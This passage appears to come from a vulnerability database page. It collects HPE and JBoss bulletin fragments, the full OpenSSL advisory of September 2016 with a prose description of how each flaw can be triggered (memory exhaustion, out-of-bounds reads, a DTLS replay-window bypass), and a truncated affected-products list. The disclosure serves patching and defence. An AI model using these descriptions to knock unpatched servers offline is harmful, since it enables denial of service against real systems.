- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 1 August 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. (CVE-2016-6808)
- A memory leak flaw was fixed in expat. Solution:
The References section of this erratum contains a download link (you must log in to download the update). JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
- (CVE-2016-2177)
It was discovered that OpenSSL did not properly handle Montgomery multiplication, resulting in incorrect results leading to transient failures. OpenSSL Security Advisory [22 Sep 2016] ========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0478", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "solaris", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "10" }, { "model": "solaris", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "11.3" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "5" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "icewall mcrp", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "3.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "icewall sso", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "lte", "trust": 0.8, "vendor": "openssl", "version": "1.0.2h" }, { "model": "icewall mcrp", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "certd" }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw" }, { "model": "icewall sso agent option", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus http server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center enterprise live data server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "nexus intercloud for vmware", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1.2" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "api connect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.0" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.2.1.1" }, { "model": "video surveillance series ip cameras", 